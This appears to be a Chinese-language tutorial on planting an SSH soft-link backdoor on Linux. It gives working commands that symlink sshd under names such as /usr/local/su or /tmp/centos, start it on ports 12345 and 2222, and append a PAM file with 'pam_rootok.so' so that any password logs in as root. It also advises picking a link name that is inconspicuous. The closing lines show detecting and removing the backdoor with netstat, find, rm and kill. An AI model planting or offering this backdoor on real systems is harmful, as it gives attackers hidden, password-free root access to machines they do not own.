通俗点来说，是sshd服务启用了PAM认证机制，在/etc/ssh/sshd_config文件中，设置UsePAM 为yes。如果不启用PAM，系统严格验证用户密码，不能建立后门。在/etc/pam.d/目录下，对应文件里包含"auth sufficient pam_rootok.so"配置，只要PAM配置文件中包含此配置即可SSH任意密码登录。

cat /etc/ssh/sshd_config

ln -sf /usr/sbin/sshd /usr/local/su;/usr/local/su -oPort=12345

ln -sf /usr/sbin/sshd /usr/local/su;/usr/local/su -oPort=12345ln -sf /usr/sbin/sshd /usr/local/su这部分命令使用 ln 命令创建一个符号链接。它将 /usr/local/su 设置为指向 /usr/sbin/sshd 的符号链接。这意味着如果你执行 /usr/local/su，实际上会启动 /usr/sbin/sshd-s：表示创建符号链接。-f：表示如果 /usr/local/su 已经存在，则强制覆盖它。/usr/local/su -oPort=12345前面那条命令创建了一个符号链接/usr/local/su指向了/usr/sbin/sshd，通俗的来讲执行/usr/local/su就相当于是在执行/usr/sbin/sshd那/usr/local/su -oPort=12345就相当于在执行/usr/sbin/sshd -oPort=12345-oPort=12345：通过 -o 指定了一个配置参数。在这里，Port=12345 意味着将监听端口设置为 12345，而不是默认的 SSH 端口（通常是 22）简单的来说这个命令将启动 SSH 服务器，并使其监听在端口 12345 上，从而允许客户端连接到该服务器。/usr/local/su 软连接 链接名是自定义的随便什么都可以（只要你写后面的时候你觉得够隐秘就可以）

echo "  #%PAM-1.0 auth       sufficient   pam_rootok.so auth       include      system-auth account    include      system-auth password   include      system-auth session    include      system-auth " >> /etc/pam.d/centos

#%PAM-1.0：这是一个注释行，PAM 配置文件通常以此开始，指示文件的版本。auth       sufficient   pam_rootok.so：这一行指定了身份验证部分的配置。它表示如果用户是 root（超级用户），则身份验证成功（sufficient），这意味着 root 用户无需进一步验证即可访问系统。auth       include      system-auth：这一行包含了 system-auth 配置文件中的内容，以进一步定义身份验证策略。通常，system-auth 包含了更复杂的身份验证规则和设置。account    include      system-auth：这一行包含了 system-auth 配置文件中的内容，用于账户户管理方面的配置。password   include      system-auth：同样，这一行包含了 system-auth 配置文件中的内容，用于密码策略的配置。session    include      system-auth：最后一行包含了 system-auth 配置文件中的内容，用于定义会话管理规则。

ln -sf /usr/sbin/sshd /tmp/centos;/tmp/centos -oPort=2222

ssh root@192.168.142.138 -p 12345ssh centos@192.168.142.138 -p 2222

netstat -anpt

ll /proc/1832#ls -al /proc/1832 命令的简写/proc/1832 不懂得可以百度一下，不想写了

find / -name suls -al /etc/selinux/targeted/active/modules/100/suls -al /etc/pam.d/suls -al /usr/local/su

rm -rf   /usr/local/su  kill -9 1832

kill -9 2558

wpkill -kill -t pts/1